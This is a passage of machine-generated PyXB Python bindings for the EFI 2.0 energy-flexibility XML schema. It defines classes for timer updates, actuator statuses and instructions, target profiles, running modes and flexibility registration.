    timerId = property(__timerId.value, __timerId.set, None, None)
    # Register the declared element/attribute for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __finishedAt.name() : __finishedAt
    })
    _AttributeMap.update({
        __timerId.name() : __timerId
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.TimerUpdate = TimerUpdate
Namespace.addCategoryObject('typeBinding', 'TimerUpdate', TimerUpdate)
# Complex type {http://www.flexiblepower.org/efi-2}TimerUpdates with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class TimerUpdates (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}TimerUpdates with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerUpdates')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 703, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}timerUpdate uses Python identifier timerUpdate
    # NOTE(review): the True positional flag appears to mark this element as
    # plural (may occur multiple times) — confirm against pyxb ElementDeclaration.
    __timerUpdate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate'), 'timerUpdate', '__httpwww_flexiblepower_orgefi_2_TimerUpdates_httpwww_flexiblepower_orgefi_2timerUpdate', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3), )
    timerUpdate = property(__timerUpdate.value, __timerUpdate.set, None, None)
    # Register the declared element for pyxb's parse/serialize machinery.
    _ElementMap.update({
        __timerUpdate.name() : __timerUpdate
    })
    _AttributeMap.update({
        
    })
# Expose the binding at module scope and register it in the namespace category map.
_module_typeBindings.TimerUpdates = TimerUpdates
Namespace.addCategoryObject('typeBinding', 'TimerUpdates', TimerUpdates)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatus with content type ELEMENT_ONLY
# PyXB-generated binding reporting one actuator's current running mode, factor,
# previous mode, transition time, and timer updates; identified by a required
# actuatorId attribute. NOTE(review): auto-generated — do not edit by hand.
class ActuatorStatus (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatus with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorStatus')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 708, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}currentRunningMode uses Python identifier currentRunningMode
    __currentRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode'), 'currentRunningMode', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2currentRunningMode', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3), )
    currentRunningMode = property(__currentRunningMode.value, __currentRunningMode.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
    __runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3), )
    runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}previousRunningModeId uses Python identifier previousRunningModeId
    __previousRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), 'previousRunningModeId', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2previousRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3), )
    previousRunningModeId = property(__previousRunningModeId.value, __previousRunningModeId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}transitionTimestamp uses Python identifier transitionTimestamp
    __transitionTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), 'transitionTimestamp', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2transitionTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3), )
    transitionTimestamp = property(__transitionTimestamp.value, __transitionTimestamp.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}timerUpdates uses Python identifier timerUpdates
    __timerUpdates = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), 'timerUpdates', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2timerUpdates', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3), )
    timerUpdates = property(__timerUpdates.value, __timerUpdates.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
    # Required xs:int attribute identifying the actuator this status refers to.
    __actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
    __actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 723, 2)
    __actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 723, 2)
    actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
    _ElementMap.update({
        __currentRunningMode.name() : __currentRunningMode,
        __runningModeFactor.name() : __runningModeFactor,
        __previousRunningModeId.name() : __previousRunningModeId,
        __transitionTimestamp.name() : __transitionTimestamp,
        __timerUpdates.name() : __timerUpdates
    })
    _AttributeMap.update({
        __actuatorId.name() : __actuatorId
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.ActuatorStatus = ActuatorStatus
Namespace.addCategoryObject('typeBinding', 'ActuatorStatus', ActuatorStatus)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatuses with content type ELEMENT_ONLY
# PyXB-generated binding: container for repeating <actuatorStatus> children.
# NOTE(review): auto-generated from the XSD — regenerate, don't hand-edit.
class ActuatorStatuses (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatuses with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorStatuses')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 725, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}actuatorStatus uses Python identifier actuatorStatus
    __actuatorStatus = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus'), 'actuatorStatus', '__httpwww_flexiblepower_orgefi_2_ActuatorStatuses_httpwww_flexiblepower_orgefi_2actuatorStatus', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3), )
    actuatorStatus = property(__actuatorStatus.value, __actuatorStatus.set, None, None)
    _ElementMap.update({
        __actuatorStatus.name() : __actuatorStatus
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.ActuatorStatuses = ActuatorStatuses
Namespace.addCategoryObject('typeBinding', 'ActuatorStatuses', ActuatorStatuses)
# Complex type {http://www.flexiblepower.org/efi-2}TargetProfile with content type ELEMENT_ONLY
# PyXB-generated binding: a profile made of repeating <element> children.
# NOTE(review): auto-generated from the XSD — regenerate, don't hand-edit.
class TargetProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}TargetProfile with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TargetProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 742, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_TargetProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.TargetProfile = TargetProfile
Namespace.addCategoryObject('typeBinding', 'TargetProfile', TargetProfile)
# Complex type [anonymous] with content type EMPTY
# PyXB-generated binding for an anonymous attribute-only type: a profile
# element carrying a duration plus lower/upper fill-level bounds. Anonymous
# types are not registered with the namespace (no addCategoryObject call).
class CTD_ANON_10 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY"""
    # EMPTY content: no child elements, attributes only.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 745, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    # Required xs:duration attribute.
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 746, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 746, 5)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
    # Required xs:double attribute.
    __fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 747, 5)
    __fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 747, 5)
    fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
    # Required xs:double attribute.
    __fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
    __fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 748, 5)
    __fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 748, 5)
    fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
    # No child elements for this type.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __fillLevelLowerBound.name() : __fillLevelLowerBound,
        __fillLevelUpperBound.name() : __fillLevelUpperBound
    })
_module_typeBindings.CTD_ANON_10 = CTD_ANON_10
# Complex type [anonymous] with content type ELEMENT_ONLY
# PyXB-generated binding for an anonymous type pairing an optional usage
# profile with an optional usage-probability profile. Anonymous types are not
# registered with the namespace (no addCategoryObject call).
class CTD_ANON_11 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 770, 7)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}usageProfile uses Python identifier usageProfile
    __usageProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageProfile'), 'usageProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_11_httpwww_flexiblepower_orgefi_2usageProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 772, 9), )
    usageProfile = property(__usageProfile.value, __usageProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}usageProbabilityProfile uses Python identifier usageProbabilityProfile
    __usageProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageProbabilityProfile'), 'usageProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_11_httpwww_flexiblepower_orgefi_2usageProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 773, 9), )
    usageProbabilityProfile = property(__usageProbabilityProfile.value, __usageProbabilityProfile.set, None, None)
    _ElementMap.update({
        __usageProfile.name() : __usageProfile,
        __usageProbabilityProfile.name() : __usageProbabilityProfile
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
_module_typeBindings.CTD_ANON_11 = CTD_ANON_11
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstruction with content type ELEMENT_ONLY
# PyXB-generated binding: an instruction for one actuator (running mode,
# factor, start time), addressed by a required actuatorId attribute.
# NOTE(review): auto-generated from the XSD — regenerate, don't hand-edit.
class ActuatorInstruction (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstruction with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorInstruction')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 782, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}runningModeId uses Python identifier runningModeId
    __runningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), 'runningModeId', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2runningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3), )
    runningModeId = property(__runningModeId.value, __runningModeId.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
    __runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3), )
    runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
    __startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3), )
    startTime = property(__startTime.value, __startTime.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
    # Required xs:int attribute identifying the target actuator.
    __actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
    __actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 795, 2)
    __actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 795, 2)
    actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
    _ElementMap.update({
        __runningModeId.name() : __runningModeId,
        __runningModeFactor.name() : __runningModeFactor,
        __startTime.name() : __startTime
    })
    _AttributeMap.update({
        __actuatorId.name() : __actuatorId
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.ActuatorInstruction = ActuatorInstruction
Namespace.addCategoryObject('typeBinding', 'ActuatorInstruction', ActuatorInstruction)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstructions with content type ELEMENT_ONLY
# PyXB-generated binding: container for repeating <actuatorInstruction>
# children. NOTE(review): auto-generated — regenerate, don't hand-edit.
class ActuatorInstructions (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstructions with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorInstructions')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 797, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}actuatorInstruction uses Python identifier actuatorInstruction
    __actuatorInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorInstruction'), 'actuatorInstruction', '__httpwww_flexiblepower_orgefi_2_ActuatorInstructions_httpwww_flexiblepower_orgefi_2actuatorInstruction', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 799, 3), )
    actuatorInstruction = property(__actuatorInstruction.value, __actuatorInstruction.set, None, None)
    _ElementMap.update({
        __actuatorInstruction.name() : __actuatorInstruction
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.ActuatorInstructions = ActuatorInstructions
Namespace.addCategoryObject('typeBinding', 'ActuatorInstructions', ActuatorInstructions)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData with content type ELEMENT_ONLY
# PyXB-generated binding for the abstract base describing a continuous running
# mode's cost and power/flow characteristics; concrete subtypes are derived
# elsewhere in the schema. NOTE(review): auto-generated — don't hand-edit.
class AdjustableContinuousRunningModeData (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    # Abstract: instances of this exact type cannot appear in documents.
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableContinuousRunningModeData')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 838, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
    __runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 840, 3), )
    runningCost = property(__runningCost.value, __runningCost.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
    __electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 841, 3), )
    electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
    __gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 842, 3), )
    gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
    __heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 843, 3), )
    heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
    __heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 844, 3), )
    heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
    __heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 845, 3), )
    heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
    _ElementMap.update({
        __runningCost.name() : __runningCost,
        __electricalPower.name() : __electricalPower,
        __gasFlowRate.name() : __gasFlowRate,
        __heatTemperature.name() : __heatTemperature,
        __heatFlowRate.name() : __heatFlowRate,
        __heatThermalPower.name() : __heatThermalPower
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.AdjustableContinuousRunningModeData = AdjustableContinuousRunningModeData
Namespace.addCategoryObject('typeBinding', 'AdjustableContinuousRunningModeData', AdjustableContinuousRunningModeData)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableRunningModes with content type ELEMENT_ONLY
# PyXB-generated binding: a collection mixing repeating discrete and
# continuous running-mode entries. NOTE(review): auto-generated — don't
# hand-edit; regenerate from the XSD.
class AdjustableRunningModes (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}AdjustableRunningModes with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableRunningModes')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 870, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}discreteRunningMode uses Python identifier discreteRunningMode
    __discreteRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), 'discreteRunningMode', '__httpwww_flexiblepower_orgefi_2_AdjustableRunningModes_httpwww_flexiblepower_orgefi_2discreteRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 873, 4), )
    discreteRunningMode = property(__discreteRunningMode.value, __discreteRunningMode.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}continuousRunningMode uses Python identifier continuousRunningMode
    __continuousRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), 'continuousRunningMode', '__httpwww_flexiblepower_orgefi_2_AdjustableRunningModes_httpwww_flexiblepower_orgefi_2continuousRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 874, 4), )
    continuousRunningMode = property(__continuousRunningMode.value, __continuousRunningMode.set, None, None)
    _ElementMap.update({
        __discreteRunningMode.name() : __discreteRunningMode,
        __continuousRunningMode.name() : __continuousRunningMode
    })
    # No attributes declared for this type.
    _AttributeMap.update({
    })
# Register the binding with the module registry and the namespace.
_module_typeBindings.AdjustableRunningModes = AdjustableRunningModes
Namespace.addCategoryObject('typeBinding', 'AdjustableRunningModes', AdjustableRunningModes)
# Complex type {http://www.flexiblepower.org/efi-2}FlexibilityRegistration with content type ELEMENT_ONLY
# PyXB-generated binding: EFI registration message extending EfiMessage with
# processing delay, device description, and currency. The element/attribute
# maps start as copies of the base class's so inherited content is preserved.
# NOTE(review): auto-generated — regenerate from the XSD, don't hand-edit.
class FlexibilityRegistration (EfiMessage):
    """Complex type {http://www.flexiblepower.org/efi-2}FlexibilityRegistration with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'FlexibilityRegistration')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 42, 1)
    # Copy base maps so updates below don't mutate EfiMessage's own maps.
    _ElementMap = EfiMessage._ElementMap.copy()
    _AttributeMap = EfiMessage._AttributeMap.copy()
    # Base type is EfiMessage
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element {http://www.flexiblepower.org/efi-2}instructionProcessingDelay uses Python identifier instructionProcessingDelay
    __instructionProcessingDelay = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'instructionProcessingDelay'), 'instructionProcessingDelay', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2instructionProcessingDelay', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 46, 5), )
    instructionProcessingDelay = property(__instructionProcessingDelay.value, __instructionProcessingDelay.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}deviceDescription uses Python identifier deviceDescription
    __deviceDescription = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'deviceDescription'), 'deviceDescription', '__httpwww_flexiblepower_orgefi_2_FlexibilityRegistration_httpwww_flexiblepower_orgefi_2deviceDescription', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 47, 5), )
    deviceDescription = property(__deviceDescription.value, __deviceDescription.set, None, None)
